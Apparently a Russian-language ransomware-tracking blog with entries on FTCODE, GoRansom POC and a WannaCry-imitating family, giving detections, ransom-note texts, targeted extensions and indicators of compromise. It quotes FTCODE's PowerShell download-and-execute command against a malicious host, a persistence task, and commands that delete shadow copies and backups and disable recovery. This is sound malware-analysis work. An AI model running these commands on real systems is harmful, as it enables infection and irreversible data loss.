FTCODE

FTCODE Ransomware

FTCode Ransomware

PowerShell Locker 2019 Ransomware

(шифровальщик-вымогатель) (первоисточник)
Translation into English

Этот крипто-вымогатель шифрует данные пользователей с помощью AES-256 (в режиме CBC) + RSA-1024, а затем требует выкуп в $500 (0.06 BTC), чтобы вернуть файлы. Оригинальное название: в записке не указано. На файле написано: нет данных.

Обнаружения:
DrWeb -> W97M.Siggen.1152, Trojan.Siggen8.50878
BitDefender -> Undetected, W97M.Downloader.INK, VB:Trojan.VBS.Downloader.AIR
ALYac -> Trojan.Ransom.Powershell
Avira (no cloud) -> TR/Agent.gillq, TR/Dldr.Script.pskrh
Symantec -> W97M.Downloader, Downloader, JS.Downloader
Microsoft -> Trojan:Win32/Vigorf.A, TrojanDownloader:O97M/FTCdedoc.A!M

ESET-NOD32 -> PowerShell/Filecoder.V, GenScript.GKP
Kaspersky -> HEUR:Trojan.Script.Generic, Trojan.Gen.MBT, Trojan-Downloader.VBS.Agent.cxu
TrendMicro -> Trojan.W97M.POWLOAD.THJAEAI, Ransom.VBS.BXCODE.A

© Генеалогия: PowerShell Locker 2013 > PowerShell Locker 2015 > PowerWare > FTCODE

Изображение — логотип статьи

К зашифрованным файлам добавляется расширение: .FTCODE


Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом. 


Активность этого крипто-вымогателя пришлась на конец сентября - начало октября 2019 г. Ориентирован на англоязычных пользователей, что не мешает распространять его по всему миру.

Записка с требованием выкупа называется: READ_ME_NOW.htm

Содержание записки о выкупе:
All your files was encrypted!
Yes, You can Decrypt Files Encrypted!!! our price 500 USD
Your personal ID: b55718ca-d726-475c-8bba-52fdb5f18***
1. Download Tor browser - https://www.torproject.org/download/
2. Install Tor browser
3. Open Tor Browser
4. Open link in TOR browser: http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/?guid=b55718ca-d726-475c-8bba-52fdb5f18***
5. Follow the instructions on this page
***** Warning*****
Do not rename files
Do not try to back your data using third-party software, it may cause permanent data loss(If you do not believe us, and still try to - make copies of all files so that we can help you if third-party software harms them)
As evidence, we can for free back one file
Decoders of other users is not suitable to back your files - encryption key is created on your computer when the program is launched - it is unique.

Перевод записки на русский язык:
Все ваши файлы были зашифрованы!
Да, вы можете расшифровать файлы в зашифрованном виде !!! наша цена 500 долларов
Ваш персональный ID: b55718ca-d726-475c-8bba-52fdb5f18***
1. Скачайте Tor браузер - https://www.torproject.org/download/
2. Установите Tor браузер 
3. Откройте Tor браузер 
4. Откройте ссылку в Tor браузере: http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/?guid=b55718ca-d726-475c-8bba-52fdb5f18***
5. Следуйте инструкциям на этой странице
***** Предупреждение *****
Не переименовывать файлы
Не пытаться создавать резервные копии своих данных с помощью сторонних программ, это может привести к необратимой потере данных (если вы нам не верите и все еще пытаетесь сделать копии всех файлов, чтобы мы могли помочь вам, сторонние программы навредят им)
В качестве доказательства мы можем бесплатно вернуть один файл
Декодеры других пользователей не подходят для резервного копирования ваших файлов - ключ шифрования создается на вашем компьютере при запуске программы - он уникален.

Скриншоты Tor-сайта вымогателей:

По истечении заданного количества дней, если выкуп не выплачивается, то сумма выкупа увеличивается:
первые 3 дня - $500
3-5 дней - $2500
5-10 дней - $5000
10-30 дней - $25000

Есть кнопка для удаления приватного ключа. 

Технические детали

Может распространяться путём взлома через незащищенную конфигурацию RDP, с помощью email-спама и вредоносных вложений, обманных загрузок, ботнетов, эксплойтов, вредоносной рекламы, веб-инжектов, фальшивых обновлений, перепакованных и заражённых инсталляторов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога.

Метод распространения с помощью email-спама и вредоносного email-вложения и запуска описан в статье Certego. Вот краткая часть в переводе на русский язык: 

Адресат получает email со ссылкой на поддельный счет с вложенным документом под названием "Fattura-2019-951692.doc". Для просмотра "защищенного" содержимого требуется включить макросы. После включения макросов запускается следующий процесс Powershell:
powershell iex ((New-Object Net.WebClient).DownloadString('xxxp://home.southerntransitions.net/?need=9f5b9ee&vid=dpec2&81038'));
В результате чего загружается фрагмент Powershell-кода, который запускается с помощью команды "Invoke-Expression" ("iex"). Обратите внимание, функция "DownloadString" сохраняет результат запроса только в памяти, чтобы избежать обнаружения антивирусами.
Новый код Powershell - это FTCODE . При выполнении он выполняет следующий запрос GET: 
xxxp://home.southerntransitions[.]net/?need=6ff4040&vid=dpec2&
Он нужен, что загрузить файл сценария Visual Basic и сохранить его в C:\Users\Public\Libraries\WindowsIndexingService.vbs
Этот вариант JasperLoader, простой бэкдор, который может загружать дополнительные необходимые данные.
Затем он пытается создать ярлык "WindowsIndexingService.lnk" в папке автозапуска пользователя, который запускает JasperLoader. Для закрепления в системе и запуска после перезагрузки создается запланированная задача "WindowsApplicationService", ссылающаяся на этот ярлык. 


Нужно всегда использовать Актуальную антивирусную защиту!!!
Если вы пренебрегаете комплексной антивирусной защитой класса Internet Security или Total Security, то хотя бы делайте резервное копирование важных файлов по методу 3-2-1. 


➤ Использует WindowsPowerShell и WindowsIndexingService.vbs, в очередной раз подтверждая их вредоносность для ОС Windows.

➤ Используется Gootkit, который способен похищать из браузеров историю посещений, пароли и файлы cookie, может делать снимки экрана и записывать все, что пользователи вводят внутри веб-форм (пароли, данные банковских карт). Кроме этого Gootkit собирает всю возможную информацию о зараженном хосте и подключенном нему оборудовании.

➤ Завершает работу, если присутствует файл %PUBLIC%\OracleKit\w00log03.tmp

Удаляет теневые копии файлов, отключает функции восстановления и исправления Windows на этапе загрузки командами:
 schtasks.exe /create /TN WindowsApplicationService /sc DAILY /st 00:00 /f /RI 14 /du 23:59 /TR %PUBLIC%\Libraries\WindowsIndexingService.vbs
 cmd.exe /c bcdedit /set hacebzb bootstatuspolicy ignoreallfailures
 bcdedit.exe bcdedit /set hacebzb bootstatuspolicy ignoreallfailures
 cmd.exe /c bcdedit /set hacebzb recoveryenabled no
 bcdedit.exe bcdedit /set hacebzb recoveryenabled no
 cmd.exe /c wbadmin delete catalog -quiet
 wbadmin.exe wbadmin delete catalog -quiet
 cmd.exe /c wbadmin delete systemstatebackup
 wbadmin.exe wbadmin delete systemstatebackup
 cmd.exe /c wbadmin delete backup
 wbadmin.exe wbadmin delete backup
 cmd.exe /c vssadmin delete shadows /all /quiet
 vssadmin.exe vssadmin delete shadows /all /quiet

Список файловых расширений, подвергающихся шифрованию:
.3fr, .7z, .accdb, .ai, .apk, .arch00, .arw, .asset, .avi, .bar, .bay, .bc6, .bc7, .big, .bik, .bkf, .bkp, .blob, .bsa, .cas, .cdr, .cer, .cfr, .cr2, .crt, .crw, .css, .csv, .d3dbsp, .das, .dazip, .db0, .dba, .dbf, .dcr, .der, .desc, .dmp, .dng, .doc, .docm, .docx, .dwg, .dxg, .epk, .eps, .erf, .esm, .ff, .flv, .forge, .fos, .fpk, .fsh, .gdb, .gho, .hkdb, .hkx, .hplg, .hvpl, .ibank, .icxs, .indd, .itdb, .itl, .itm, .iwd, .iwi, .jpe, .jpeg, .jpg, .js, .kdb, .kdc, .kf, .layout, .lbf, .litemod, .lrf, .ltx, .lvl, .m2, .m3u, .m4a, .map, .mcmeta, .mdb, .mdbackup, .mddata, .mdf, .mef, .menu, .mlx, .mov, .mp4, .mpqge, .mrwref, .ncf, .nrw, .ntl, .odb, .odc, .odm, .odp, .ods, .odt, .orf, .p12, .p7b, .p7c, .pak, .pdd, .pdf, .pef, .pem, .pfx, .pkpass, .png, .ppt, .pptm, .pptx, .psd, .psk, .pst, .ptx, .py, .qdf, .qic, .r3d, .raf, .rar, .raw, .rb, .re4, .rgss3a, .rim, .rofl, .rtf, .rw2, .rwl, .sav, .sb, .sid, .sidd, .sidn, .sie, .sis, .slm, .snx, .sql, .sr2, .srf, .srw, .sum, .svg, .syncdb, .t12, .t13, .tax, .tor, .txt, .upk, .vcf, .vdf, .vfs0, .vpk, .vpp_pc, .vtf, .w3x, .wb2, .wma, .wmo, .wmv, .wotreplay, .wpd, .wps, .x3f, .xf, .xlk, .xls, .xlsb, .xlsm, .xlsx, .xxx, .zip, .ztmp (186 расширений).

Это документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, файлы wallet, архивы и пр.

Файлы, связанные с этим Ransomware:
Fattura-2019-951692.doc
READ_ME_NOW.htm
AFX50058.tmp
w00log03.tmp - специальный файл
powershell.exe
<random>.exe - случайное название вредоносного файла
Scan_New_Folder-816663234378244557295027251718767477098569059779.vbs

Файлы проектов: 
wscript.pdb, powershell.pdb

➤ В коде есть фраза "BXCODE hack your system". 

Расположения:
\Desktop\ ->
\User_folders\ ->
\%TEMP%\ ->

Записи реестра, связанные с этим Ransomware:
См. ниже результаты анализов.

Сетевые подключения и связи:
Tor-URL: http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/
URL: home.hopedaybook.com
connect.theshotboard.org
Email: - 
BTC: 1ENTEb7MbYfuvUYeTX8foCUPqUnQUWGZsN 
См. ниже в обновлениях другие адреса и контакты.
См. ниже результаты анализов.

Результаты анализов:
Ⓗ Hybrid analysis >>
𝚺  VirusTotal analysis >>  VT>>
🐞 Intezer analysis >>
ᕒ  ANY.RUN analysis >>  AR>>
ⴵ  VMRay analysis >>
Ⓥ VirusBay samples >>
⨇ MalShare samples >>
👽 AlienVault analysis >>
🔃 CAPE Sandbox analysis >>
⟲ JOE Sandbox analysis >>


Степень распространённости: средняя.
Подробные сведения собираются регулярно. Присылайте образцы.

---

=== ИСТОРИЯ СЕМЕЙСТВА === HISTORY OF FAMILY ===

---

=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===

Обновление от 1 октября 2019:
Пост в Твиттере >>
Пост в Твиттере >>
Расширение: .FTCODE 
Записка:  READ_ME_NOW.htm
Tor-URL: xxxx://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/?guid=b55718ca-d726-475c-8bba-52fdb5f18ede
URL: xxxx://home.southerntransitions.net/
xxxx://connect.southerntransitions.com/
Файлы: powershell.exe, Fattura-2019-951692.doc
Мьютексы: CLR_PerfMon_WrapMutex, CLR_CASOFF_MUTEX и другие, см. результаты VT.
Результаты анализов: VT + HA + AR

Обновление от 9-11 октября 2019:
Пост в Твиттере >>
Расширение: .<random> 
Записка:  READ_ME_NOW.htm
URL: xxxx://archive.org
xxxx://agency.heritage-insuranceagency.com
Файлы: powershell.exe, WindowsIndexingService.vbs, myvtfile.exe
Результаты анализов: VT + AR

Обновление от 15 октября 2019:
Пост в Твиттере >>
Расширение: .<random> или .<random{6}>
Примеры: .509a49, .21f219, 13d419
Записка: READ_ME_NOW.htm
URL: xxxx://jes.dhinsuranceservices.com/
URL: xxxx://jes.whisperinghillequestriancenter.com
Файл MS Word: Nuovo_documento_52.doc  и с другими номерами
Результаты анализов: VT + HA + AR / VT / VT + HA + VMR

➤ Содержание записки: 
All your files was encrypted!
Yes, You can Decrypt Files Encrypted!!!
Your personal ID: fbe8dd2b-9f8e-4753-b196-76554809b1f7
1. Download Tor browser - https://www.torproject.org/download/
2. Install Tor browser
3. Open Tor Browser
4. Open link in TOR browser: http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/?guid=fbe8dd2b-9f8e-4753-b196-76554809b1f7
5. Follow the instructions on this page
***** Warning*****
Do not rename files
Do not try to back your data using third-party software, it may cause permanent data loss(If you do not believe us, and still try to - make copies of all files so that we can help you if third-party s oftware harms them)
As evidence, we can for free back one file
Decoders of other users is not suitable to back your files - encryption key is created on your computer when the program is launched - it is unique.


Обновление от 30 октября 2019:
Пост в Твиттере >>
Записка: READ_ME_NOW.htm
Результаты анализов: VT + AR
URL: xxxx://static.nexilia.it
xxxx://mobi.confessyoursins.mobi

Обновление от 1 ноября 2019:
Пост в Твиттере >>
Записка: READ_ME_NOW.htm
Результаты анализов: VT + AR


Обновление от 7 ноября 2019:
Пост в Твиттере >>
Записка: READ_ME_NOW.htm
URL: xxxp://dbi.shadysidechurch.com/

Обновление от 28 ноября 2019:
Пост в Твиттере >>

 

На скриншотах выделен код инфо-стилера. 

Обновление от 10 декабря 2019:
Пост в Твиттере >>
Записка: READ_ME_NOW.htm
Файлы: ScanDocumento__11725497dfc376f565dc41df11738bdaff.vbs
Результаты анализов: VT + AR

Обновление от 11 декабря 2019:
Топик на форуме >>
Расширение: .<random> или .<random{6}>
Записка: READ_ME_NOW.htm

Обновление от 20 января 2020: 
FTCode теперь собирает учетные данные из браузеров (Internet Explorer, Mozilla Firefox, Google Chrome) и email-клиентов (Mozilla Thunderbird, Microsoft Outlook). Способы доступа отличаются: а) в случае с Internet Explorer и Microsoft Outlook, FTCode получает прямой доступ к ключам реестра; б) в случае с Mozilla Firefox, Mozilla Thunderbird и Google Chrome FTCode проникает в папки, где эти приложения хранят учетные данные.
После сбора информации FTCode отправляет её своим операторам, используя запрос POST, отправленный на его командно-контрольный сервер (C&C), а имена пользователей и пароли будут закодированы с использованием схемы кодирования Base64. 
Подробнее в статье на сайте BleepingComputer >>

---

=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===

 Read to links: 
 Tweet on Twitter + Tweet + Tweet + myTweet
 ID Ransomware (ID as FTCode)
 Write-up, Topic of Support
 Earlier tweets I did not know about: Tw, Tw 

Added later:
Write-up BleepingComputer (October 3, 2019)
Write-up Certego (October 2, 2019)
*

 - Видеообзор от CyberSecurity GrujaRS

 Thanks: 
 GrujaRS, Michael Gillespie, Marco Bompani, Matteo Lodi
 Andrew Ivanov (author)
 Wojciech S., TG Soft, Certego, Lawrence Abrams
 to the victims who sent the samples
 

© Amigo-A (Andrew Ivanov): All blog articles.

GoRansom

GoRansom POC Ransomware

(шифровальщик-НЕ-вымогатель) (первоисточник)

Translation into English

Этот крипто-вымогатель шифрует данные пользователей с помощью XOR, а затем сообщает, как самостоятельно вернуть файлы. Оригинальное название: GoRansom POC Ransomware. На файле написано: GoRansom.exe, windows_x86.exe. Написан на языке Golang.

Обнаружения:
DrWeb -> Trojan.Encoder.29575
BitDefender -> Gen:Variant.Razy.546521
Symantec -> ML.Attribute.HighConfidence
ALYac -> Trojan.Ransom.GoRansom
Malwarebytes -> Ransom.GoRansom

© Генеалогия: инструменты APT34 + Golang >> GoRansom POC

Изображение — только логотип статьи

К зашифрованным файлам добавляется расширение: .gore


Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом. 


Активность этого крипто-вымогателя пришлась на вторую половину сентября 2019 г. Ориентирован на англоязычных пользователей, что не мешает распространять его по всему миру.

Записка без требований выкупа называется: GoRansom.txt

Содержание записки о выкупе:
Files have been encrypted by The GoRansom POC Ransomware
  Decryption Key is hardcoded in the binary.
  Uses XOR encryption with an 8bit (byte) key.
  Only 255 possible keys.
  Run the ransomware in the command line with one argument, decrypt.
  Example: GoRansom.exe decrypt

Перевод записки на русский язык:
Файлы были зашифрованы с помощью GoRansom POC Ransomware
   Ключ расшифровки жестко закодирован в двоичном файле.
   Использует шифрование XOR с 8-битным (байтовым) ключом.
   Всего 255 возможных ключей.
   Запустите Ransomware в командной строке с одним аргументом, расшифровать.
   Пример: GoRansom.exe decrypt

Технические детали

Согласно Intezer-анализу может быть связан с утекшими в Сеть инструментами кибергруппы APT34 (они же Oilrig и HelixKitten), которым могли воспользоваться другие киберпреступники. 

Может распространяться путём взлома через незащищенную конфигурацию RDP, с помощью email-спама и вредоносных вложений, обманных загрузок, ботнетов, эксплойтов, вредоносной рекламы, веб-инжектов, фальшивых обновлений, перепакованных и заражённых инсталляторов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога.

Нужно всегда использовать Актуальную антивирусную защиту!!!
Если вы пренебрегаете комплексной антивирусной защитой класса Internet Security или Total Security, то хотя бы делайте резервное копирование важных файлов по методу 3-2-1. 


Список файловых расширений, подвергающихся шифрованию:
Это документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, архивы и пр.

Файлы, связанные с этим Ransomware:
GoRansom.txt
windows_x86.exe
GoRansom.exe
<random>.exe - случайное название вредоносного файла

Расположения:
\Desktop\ ->
\User_folders\ ->
\%TEMP%\ ->

Записи реестра, связанные с этим Ransomware:
См. ниже результаты анализов.

Сетевые подключения и связи:
Email: - 
BTC: - 
См. ниже в обновлениях другие адреса и контакты.
См. ниже результаты анализов.

Результаты анализов:
Ⓗ Hybrid analysis >>
𝚺  VirusTotal analysis >>  VT>>  VT>>
🐞 Intezer analysis >>
ᕒ  ANY.RUN analysis >>  AR>>  AR>>
ⴵ  VMRay analysis >>
Ⓥ VirusBay samples >>
⨇ MalShare samples >>
👽 AlienVault analysis >>
🔃 CAPE Sandbox analysis >>
⟲ JOE Sandbox analysis >>


Степень распространённости: низкая.
Подробные сведения собираются регулярно. Присылайте образцы.

---

=== ИСТОРИЯ СЕМЕЙСТВА === HISTORY OF FAMILY ===

---

=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===

Ещё не было обновлений этого варианта.

---

=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===

Запустите GoRansom.exe в командной строке с аргументом decrypt

 Read to links: 
 Tweet on Twitter + Tweet + myTweet
 ID Ransomware (ID as GoRansom)
 Write-up, Topic of Support
 * 

 Thanks: 
 CyberSecurity GrujaRS, Michael Gillespie, JAMESWT
 Andrew Ivanov (author)
 ***
 to the victims who sent the samples
 

© Amigo-A (Andrew Ivanov): All blog articles.

WannaCry Fake

WannaCryFake Ransomware

WannaFaker Ransomware

WannaCryGeneric: 

Snc, BlackRoot (BlackRouter), CCC, AWT, WannaScream (DarkCrypt), Harma, FOB, ADHUBLLKA, NORD, H@RM@, Bang

(шифровальщик-вымогатель) (первоисточник)
Translation into English

Этот крипто-вымогатель шифрует данные пользователей с помощью AES-256, а затем требует выкуп в # BTC, чтобы вернуть файлы. Оригинальное название: Ransomware Snc. На файле написано: Windows Defender.exe. Разработчик скрывается под ником: jack sparrow. 

Обнаружения:
DrWeb -> Trojan.Encoder.30061, Trojan.Encoder.30462, Trojan.Encoder.30486
BitDefender -> Generic.Ransom.WCryG.3D9A4E8B, Generic.Ransom.WCryG.B4A5A896
Avira (no cloud) -> TR/Crypren.rbpfo, TR/Crypren.ykcxt
ESET-NOD32 -> A Variant Of MSIL/Filecoder.UX, MSIL/Filecoder.WannaCryFake.A
Kaspersky -> HEUR:Trojan-Ransom.MSIL.Crypren.gen
Symantec -> Trojan.Gen.MBT, Trojan.Gen.2, ML.Attribute.HighConfidence

© Генеалогия: Sepsis + DCRTR-WDM + Phobos >> WannaCry Fake, WannaCryGeneric > Snc, AWT, WannaScream, Harma, FOB, ADHUBLLKA, NORD

Генеалогия подтверждена сервисом Intezer >>

Изображение — только логотип статьи

К зашифрованным файлам добавляется расширение: .WannaCry

Фактически используется составное расширение: .[BFEBFBFF000906E9][recoverydata54@protonmail.com].WannaCry

При этом используется шаблон: .[<id>][recoverydata54@protonmail.com].WannaCry

Примеры зашифрованных файлов: 
Photo_001.jpg.[BFEBFBFF000906E9][recoverydata54@protonmail.com].WannaCry
desktop.ini.[1F8BFBFF000506E3][recoverydata54@protonmail.com].WannaCry

Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом. 


Этимология названия: 
Оригинальное название в записке не указано. Для идентификации в ID Ransomware было использовано расширение, добавляемое к файлам. ОНо было использовано для названия WannaCry Fake (т.е. фальшивый WannaCry). На исполняемом файле написано Windows Defender.exe, т.к. образом это также фальшивый Защитник Windows — Fake Windows Defender.  

Активность этого крипто-вымогателя пришлась на середину сентября 2019 г. Ориентирован на англоязычных пользователей, что не мешает распространять его по всему миру.

Записки с требованием выкупа называются: 
info.txt
info.hta

Содержание txt-записки о выкупе:

PLEASE SEND THIS CODE WITH YOUR EMAIL: XXXXXXXXXXXX
To decrypt them send e - mail to this address: recoverydata54@protonmail.com
Also you can use Telegram ID: @data54

Перевод txt-записки на русский язык:
ПОЖАЛУЙСТА, ПРИШЛИТЕ ЭТОТ КОД С ВАШИМ EMAIL: XXXXXXXXXXXX
Для расшифровки пришлите email на адрес: recoverydata54@protonmail.com
Также можете использовать Telegram ID: @data54

Другая записка в HTA-формате очень похожа на те, что используются в DCRTR-WDM Ransomware и Phobos Ransomware. Видимо вымогатели хотели ввести пострадавших в заблуждение и напугать этими вымогателями, которые в данное время не поддаются расшифровке. 

Содержание hta-записки о выкупе:
All your files have been encrypted!
All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail recoverydata54@protonmail.com
also You can use telegram ID:@data54
You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the tool that will decrypt all your files.
Free decryption as guarantee
Before paying you can send us up to 5 files for free decryption. The total size of files must be less than 4Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)
How to obtain Bitcoins
The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.
https://localbitcoins.com/buy_bitcoins
Also you can find other places to buy Bitcoins and beginners guide here:
http://www.coindesk.com/information/how-can-i-buy-bitcoins/
Jabber client installation instructions:
Download the jabber (Pidgin) client from https://pidgin.im/download/windows/
After installation, the Pidgin client will prompt you to create a new account.
Click "Add"
In the "Protocol" field, select XMPP
In "Username" - come up with any name
In the field "domain" - enter any jabber-server, there are a lot of them, for example - exploit.im
Create a password
At the bottom, put a tick "Create account"
Click add
If you selected "domain" - exploit.im, then a new window should appear in which you will need to re-enter your data:
User password
You will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below)
If you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install
Attention!
Do not rename encrypted files.
Do not try to decrypt your data using third party software, it may cause permanent data loss.
Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Технические детали

Может распространяться путём взлома через незащищенную конфигурацию RDP, с помощью email-спама и вредоносных вложений, обманных загрузок, ботнетов, эксплойтов, вредоносной рекламы, веб-инжектов, фальшивых обновлений, перепакованных и заражённых инсталляторов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога.

Нужно всегда использовать Актуальную антивирусную защиту!!!
Если вы пренебрегаете комплексной антивирусной защитой класса Internet Security или Total Security, то хотя бы делайте резервное копирование важных файлов по методу 3-2-1. 


➤ Удаляет теневые копии файлов с помощью команды:

vssadmin.exe delete shadows /all /quiet 

Список файловых расширений, подвергающихся шифрованию:
.1cd, .3dm, .3dm.max, .3ds, .3fr, .3g2, .3gp, .3pr, .7z, .7zip, .aac, .aaf, .aaf, .ab4, .accdb, .accde, .accdr, .accdt, .ach, .acr, .act, .adb, .adp, .ads, .aep, .aepx. plb, .aes, .aet, .agdl, .ai, .aif, .aiff, .ait, .al, .amr, .aoi, .apj, .apk, .arch00, .arw, .as, .as3, .asf, .asm, .asp, .aspx, .asset, .asx, .atr, .avi, .awg, .back, .backup, .backupdb, .bak, .bar, .bay, .bc6, .bc7, .bdb, .bgt, .big, .bik, .bin, .bkf, .bkp, .blend, .blob, .bmd, .bmp, .bpw, .bsa, .c, .cas, .cdc, .cdf, .cdr, .cdr3, .cdr4, .cdr5, .cdr6, .cdrw, .cdx, .ce1, .ce2, .cer, .cfg, .cfr, .cgm, .cib, .class, .cls, .cmt, .config, .contact, .cpi, .cpp, .cr2, .craw, .crt, .crw, .cs, .csh, .csl, .css, .csv, .d3dbsp, .dac, .dar, .das, .dat, .dazip, .db, .db_journal, .db0, .db3, .dba, .dbf, .dbf, .dbx, .dc2, .dcr, .dcs, .ddd, .ddoc, .ddrw, .dds, .der, .des, .desc, .design, .dgc, .dir, .dit, .djvu, .dmp, .dng, .doc, .docb, .docm, .docx, .dot, .dotm, .dotx, .drf, .drw, .dtd, .dwg, .dwg, .dxb, .dxf, .dxf, .dxg, .easm, .edb, .efx, .efx, .eml, .epk, .eps, .erbsql, .erf, .esm, .exf, .fdb, .ff, .ffd, .fff, .fh, .fhd, .fla, .flac, .flf, .flv, .flvv, .forge, .fos, .fpk, .fpx, .fsh, .fxg, .gdb, .gdoc, .gho, .gif, .gmap, .gray, .grey, .groups, .gry, .gsheet, .h, .hbk, .hdd, .hkdb, .hkx, .hplg, .hpp, .htm, .html, .hvpl, .ibank, .ibd, .ibz, .icxs, .idml, .idml, .idx, .iff, .iif, .iiq, .incpas, .indb, .indd, .indl, .indt, .inx, .itdb, .itl, .itm, .iwd, .iwi, .jar, .java, .jnt, .jpe, .jpeg, .jpg, .js, .kc2, .kdb, .kdbx, .kdc, .key, .kf, .kpdx, .kwm, .laccdb, .layout, .lbf, .lck, .ldf, .lit, .litemod, .log, .lrf, .ltx, .lua, .lvl, .m, .m2, .m2ts, .m3u, .m3u8, .m4a, .m4p, .m4u, .m4v, .map, .max, .mbx, .mcmeta, .md, .mdb, .mdbackup, .mdc, .mddata, .mdf, .mdi, .mef, .menu, .mfw, .mid, .mkv, .mlb, .mlx, .mmw, .mny, .mos, .mov, .mp3, .mp4, .mpa, .mpeg, .mpg, .mpp, .mpqge, .mrw, .mrwref, .msg, .myd, .nc, .ncf, .nd, .ndd, .ndf, .nef, .nk2, .nop, .nrw, .ns2, .ns3, .ns4, .nsd, .nsf, .nsg, .nsh, .ntl, .nvram, .nwb, .nx2, .nxl, .nyf, .oab, .obj, .odb, .odc, .odf, .odg, .odm, .odp, .ods, .odt, .ogg, .oil, .orf, .ost, .otg, .oth, .otp, .ots, .ott, .p12, .p7b, .p7c, .pab, .pages, .pak, .pas, .pat, .pcd, .pct, .pdb, .pdd, .pdf, .pef, .pem, .pfx, .php, .pif, .pkpass, .pl, .plb, .plc, .plt, .plus_muhd, .pmd, .png, .po, .pot, .potm, .potx, .ppam, .ppam, .ppj, .ppj, .ppk, .pps, .ppsm, .ppsx, .ppt, .ppt, .pptm, .pptx, .prel, .prf, .prproj, .ps, .psafe3, .psd, .psk, .pst, .ptx, .pwm, .py, .qba, .qbb, .qbm, .qbr, .qbw, .qbx, .qby, .qcow, .qcow2, .qdf, .qed, .qic, .r3d, .ra, .raf, .rar, .rat, .raw, .rb, .rdb, .re4, .rgss3a, .rim, .rm, .rofl, .rtf, .rtf, .rvt, .rw2, .rwl, .rwz, .s3db, .safe, .sas7bdat, .sav, .save, .say, .sb, .sd0, .sda, .sdf, .ses, .shx, .sid, .sidd, .sidn, .sie, .sis, .sldasm, .sldblk, .sldm, .sldprt, .sldx, .slm, .snx, .sql, .sqlite, .sqlite3, .sqlitedb, .sr2, .srf, .srt, .srw, .st4, .st5, .st6, .st7, .st8, .stc, .std, .sti, .stl, .stm, .stw, .stx, .sum, .svg, .swf, .sxc, .sxd, .sxg, .sxi, .sxm, .sxw, .syncdb, .t12, .t13, .tap, .tax, .tex, .tga, .thm, .tif, .tlg, .tor, .txt, .txt, .upk, .v3d, .vbox, .vcf, .vdf, .vdi, .vfs0, .vhd, .vhdx, .vmdk, .vmsd, .vmx, .vmxf, .vob, .vpk, .vpp_pc, .vtf, .w3x, .wab, .wad, .wallet, .wav, .wb2, .wma, .wma, .wmo, .wmv, .wotreplay, .wpd, .wps, .x11, .x3f, .xf, .xis, .xla, .xlam, .xlk, .xll, .xlm, .xlr, .xls, .xlsb, .xlsb3dm, .xlsm, .xlsx, .xlt, .xltm, .xltx, .xlw, .xml, .xqx, .xxx, .ycbcra, .yuv, .zip, .ztmp (539 расширений без дублей).

Это документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, архивы и пр.

Файлы, связанные с этим Ransomware:
Windows Defender.exe
Windows Defender.pdb
info.txt
info.hta
<random>.exe - случайное название вредоносного файла
Ransomware Snc.pdb

Расположения:
\Desktop\ ->
\User_folders\ ->
\%TEMP%\ ->
C:\Users\jack sparrow\Desktop\speed\ME\Banner\WpfApp1\obj\Release\Ransomware Snc.pdb

Записи реестра, связанные с этим Ransomware:
См. ниже результаты анализов.

Сетевые подключения и связи:
Email: recoverydata54@protonmail.com
BTC: - 
Telegram: @data54
См. ниже в обновлениях другие адреса и контакты.
См. ниже результаты анализов.

Результаты анализов:
Ⓗ Hybrid analysis >>
𝚺  VirusTotal analysis >>  VT>>
🐞 Intezer analysis >>
ᕒ  ANY.RUN analysis >>  AR>>
ⴵ  VMRay analysis >>
Ⓥ VirusBay samples >>
⨇ MalShare samples >>
👽 AlienVault analysis >>
🔃 CAPE Sandbox analysis >>
⟲ JOE Sandbox analysis >>


Степень распространённости: низкая.
Подробные сведения собираются регулярно. Присылайте образцы.

---

=== ИСТОРИЯ СЕМЕЙСТВА === HISTORY OF FAMILY ===

Файлы зашифрованы с расширением .WannaCry - сентября 2019
Файлы зашифрованы с расширением .Snc - октябрь 2019
Файлы зашифрованы с расширением .BlackRoot - ноябрь 2019
Файлы зашифрованы с расширением .ccc - ноябрь 2019

Файлы зашифрованы с расширением .AWT - январь 2020
Файлы зашифрованы с расширением .WannaScream - январь 2020
Файлы зашифрованы с расширением .harma - январь 2020

Файлы зашифрованы с расширением .FOB -  май 2020

Файлы зашифрованы с расширением .ADHUBLLKA - август 2020

Файлы зашифрованы с расширением .NORD - сентябрь-октябрь 2020

Файлы зашифрованы с расширением .H@RM@ - октябрь 2020

Файлы зашифрованы с расширением .Cns - октябрь 2021

---

=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===

Обновление от 8 октября 2019:
Топик на форуме >>
Расширение: .Snc
